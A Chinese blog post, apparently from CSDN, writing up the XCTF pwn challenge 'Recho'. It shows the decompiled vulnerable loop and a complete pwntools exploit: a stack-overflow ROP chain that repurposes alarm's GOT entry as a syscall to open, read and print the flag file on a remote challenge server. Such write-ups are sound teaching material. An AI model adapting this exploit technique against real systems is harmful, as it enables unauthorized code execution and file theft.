pwn 继续Recho

最新推荐文章于 2023-02-07 11:37:59 发布
最新推荐文章于 2023-02-07 11:37:59 发布
阅读量631 收藏 1
点赞数
分类专栏: 题目 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37433000/article/details/101602828
版权

好久没有更新博客了师傅们的评论都看了emem萌新会加油的~~
这是一道xctf上的pwn题Rcho
主函数的逻辑很简单就是`// local variable allocation has failed, the output may be wrong!
int __cdecl main(int argc, const char **argv, const char **envp)
{
char nptr; // [rsp+0h] [rbp-40h]
char buf[40]; // [rsp+10h] [rbp-30h]
int v6; // [rsp+38h] [rbp-8h]
int v7; // [rsp+3Ch] [rbp-4h]

Init(*(_QWORD *)&argc, argv, envp);
write(1, “Welcome to Recho server!\n”, 0x19uLL);
while ( read(0, &nptr, 0x10uLL) > 0 )
{
v7 = atoi(&nptr);
if ( v7 <= 15 )
v7 = 16;
v6 = read(0, buf, v7);
buf[v6] = 0;
printf("%s", buf);
}
return 0;
}`
十分的清晰的是由栈溢出的漏洞我们需要想的就是怎么能够leak出libc
还有这是一个死循环怎么退出这个循环不让我们继续输入很有意思的是还有一个地方我也是后面
在这里插入图片描述
这个程序在数据段竟然还有打开flag的操作那估计是系统调用了open-read-write
但是我还是百度了我了解太少emem
**int 80和syscenter采用的同样的传参顺序:eax,ebx,ecx,edx。但是syscall的传参顺序居然变成了rdi,rsi,rdx,r10,r9,r8。之前一直认为这三种方式采用的是同样的传参方式。
**
我靠真的难然乎就是调试了给大家看一个明显的图片
在这里插入图片描述
很明显我的栈上部署了我写的ROP链
少写了一个pop_rdi找了我半天…
逻辑就是先切函数syscall然后

fd=open(flag)
read(fd,bss,0x100);
write(1,bss,0x100);

ROP链这么构造就行了上exp

from pwn import *
import pwnlib
#context.terminal = ['tmux', 'splitw', '-h']
#p=process('./echo')
p=remote('111.198.29.45',48759)
elf=ELF('./echo')
add_ret=0x000000000040070d
pop_rdi=0x004008a3
pop_rsi_r15=0x00000000004008a1
pop_rax=0x00000000004006fc
pop_rdx = 0x00000000004006fe
payload='a'*0x38
alarm=elf.got['alarm']
payload+=p64(pop_rax)+p64(0x5)+p64(pop_rdi)+p64(alarm)
payload+=p64(add_ret)+p64(pop_rax)+p64(0x2)+p64(pop_rdi)
payload+=p64(0x601058)+p64(pop_rsi_r15)+p64(0)*2
payload+=p64(pop_rdx)+p64(0)+p64(elf.plt['alarm'])+p64(pop_rdi)
payload+=p64(0x3)+p64(pop_rsi_r15)+p64(0x601090)+p64(0)+p64(pop_rdx)+p64(0x30)
payload+=p64(elf.plt['read'])+p64(pop_rdi)+p64(1)+p64(pop_rsi_r15)+p64(0x601090)
payload+=p64(0)+p64(pop_rdx)+p64(0x30)+p64(elf.plt['write'])
p.sendlineafter('server', str(0x1000))
#pwnlib.gdb.attach(p)
#pause()
p.send(payload)
p.shutdown('send')
p.interactive()

还是很难阿好难

doudoudedi
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PWN系列】攻防世界 RECHO 题解
Vicl1fe的博客
11-03 451
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 参考网址: https://www.freesion.com/article/5370510581/ 参考网址写的很详细。转载一下。
攻防世界 Pwn Recho
MrTreebook的博客
12-18 644
攻防世界 Pwn Recho1.题目下载地址2.checksec3.IDA分析4.exp 1.题目下载地址 点击下载 2.checksec 3.IDA分析 可以看到这个while是死循环 所以要学会使用pwntools的shutdown功能来退出循环 但是循环退出之后就不能再进入了 接下来要看一下漏洞在哪 这个题目有个明显后门,在data段发现有flag。可以将它read到bss段中,再通过write输出出来 在gdb动态调试时,分析alarm,发现有 有syscall系统调用 漏洞利用思路如下:
pwn-Recho
醉等佳人归
09-08 272
1.题目 1.保护机制 开启nx 2.关键代码 2.思路 重点1:看出来是个很简单的栈溢出,但是第一个问题是这个循环是个死循环,如果直接使用close()函数程序会直接退出,查询资料后发现pwn库中提供了shutdown()函数,他可以关闭IO流,即让循环正常退出 重点2:既然使用shutdown函数,我们必须一次性将payload发送过去,这就导致我们不能使用内存泄漏来泄漏system函数,查询了一下字符串发现有一个flag,所以我们考虑使用系统调用完成,alarm,open,read,write函数的
攻防世界--Recho
qq_73149934的博客
02-07 206
攻防世界--Recho
【攻防世界】Recho
weixin_43960998的博客
03-28 668
1.程序逆向 简单,略 2.漏洞利用 这道题想了半天,没想明白怎么退出循环,所以看了 ha1vk 师傅博客,学习了一波。 退出循环主要是利用 pwntools 提供的一个功能:shutdown。这个功能可以关闭流,这样就可以退出循环了。     因为对于有些系统,system 可以用系统调用,但是有些不行,所以这里采用 orw 的方式读取 flag。 shift + f12 可以看到 flag 字符串,所以也可能是提示我们。 题目中有了 read,write 可以使用
攻防世界pwn题:Recho.doc
07-13
攻防世界pwn题:Recho.doc 知识点总结 本文总结了攻防世界pwn题:Recho.doc的知识点,涵盖了二进制文件分析、栈溢出、ROP技术、libc泄露、系统调用等多个方面。 1. 二进制文件分析 攻防世界pwn题:Recho.doc是一...
2024NKCTF-pwn
最新发布
03-25
2024NKCTF_pwn
welpwn pwn 入门题
02-11
pwn 入门题
PWN.rar_PWN
09-24
在IT领域,PWN(Payload Writing Notation)通常与安全竞赛和漏洞利用有关,尤其是在网络安全和逆向工程中。然而,这里的"pwn"似乎指的是一个特定的功能或项目,而不是通常的安全概念。从标题和描述来看,我们正在...
bugku pwn题libc
11-06
bugku pwn题libc,pwn3做题时可在里面查找system、binsh等
(攻防世界)(pwn)(RCTF2017)Recho
PLpa的博客
09-07 1686
0x00.前言 又是一题栈溢出题,但是又有一点点不同。。。 0x01.程序逻辑 程序保护: 程序只开了NX保护,堆栈不可执行。 进入IDA 程序让你先输入你将要输入的字符串长度,然后继续让你输入字符串。 最后,程序会输出你输入的字符串。 看起来,这很像一般的栈溢出,甚至我们可以通过程序的输出把一些敏感的地址给输出出来。 更加让人欣喜的是,这个程序好像给了什么不得了的东西。 0x02.奇怪的东西...
攻防世界进阶题Recho——知识点缝合怪
weixin_48066554的博客
09-20 828
攻防世界进阶题Recho——知识点缝合怪 文章目录攻防世界进阶题Recho——知识点缝合怪引入初分析1、checksec2、主函数结构3、栈结构4、特殊字符串解题过程1、gadget搜集2、GOT表详情3、函数参数说明exp(详细注释) 引入 好久没有做pwn题了,手生的厉害,做道简单题练练手好了 这道题其实难度不高,属于那种开门见山把漏洞点抛出任君采撷的题,但是由于涉及的知识点较多,在ROP链构造时需要有清晰的思路,对于我这样的小白来说自然是再好不过的练习题。 初分析 1、checksec 题目拿到手上,
攻防世界高手进阶区——Recho
weixin_62675330的博客
03-11 416
攻防世界高手进阶区——Recho 题目什么也没给。(在这个题困了好久,一直在学基础,但是发现了一个更好用的学习网站,基本 ROP - CTF Wiki (ctf-wiki.org))希望对你们有用,估计以后就转战ctfwiki了。先做完这个题吧。 做题经历 int __cdecl main(int argc, const char **argv, const char **envp) { char nptr[16]; // [rsp+0h] [rbp-40h] BYREF char buf[40]
ADworld pwn wp - Recho
fa1c4的blog
06-27 143
可以任意长度输入, 存在溢出, 不过溢出之后再次输入还是继续执行, 无法退出循环就不能劫持程序流 这里用到pwntools的一个函数, 用来结束输入流, 从而结束循环 def shutdown(self, direction = "send"): """shutdown(direction = "send") Closes the tube for futher reading or writing depending on `direction`. Ar..
XCTF Recho
weixin_44164182的博客
01-02 207
XCTF Recho ROP构造linux系统调用 from pwn import * import time from ctypes import * # context.update(log_level='debug', timeout='2') context.log_level = 'debug' context.timeout = 2 # r = process('./Recho') r = remote('220.249.52.134', 54741) elf = ELF('./Recho'
逆向题解二
admin的博客
09-12 2769
MoeCTF新生赛逆向A_game step1: 先探探这个exe的底 拉到die里头。发现是个64位程序。 step2:拉到IDA64里面反编译瞅瞅源码 按F5,反编译的源码如下。 // local variable allocation has failed, the output may be wrong! int __cdecl main(int argc, const char **argv, const char **envp) { int v3; // ...
BUUCTF 逆向工程(reverse)之[MRCTF2020]Transform
weixin_44632787的博客
08-25 820
用IDA打开,进入到主函数 // local variable allocation has failed, the output may be wrong! int __cdecl main(int argc, const char **argv, const char **envp) { __int64 v3; // rdx __int64 v4; // rdx char v6[104]; // [rsp+20h] [rbp-70h] int j; // [rsp+88h] [rbp-8
IDA反编译失败总结
寻梦&之璐
05-24 7241
文章目录call analysis failedtoo big functionpositive sp valuecannot convert to microcodelocal variable allocation failedstack frame is too big call analysis failed call analysis failed 查看函数参数 压入两个参数,但实际分析时它却只有一个 对该函数按'y'键,将其参数修改为两个,去掉三个即可 然后成功 too big fu
校赛writeup
热门推荐
Ni9htMar3的博客
12-26 1万+
第一届校赛 WEB MISC RE Crypto

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值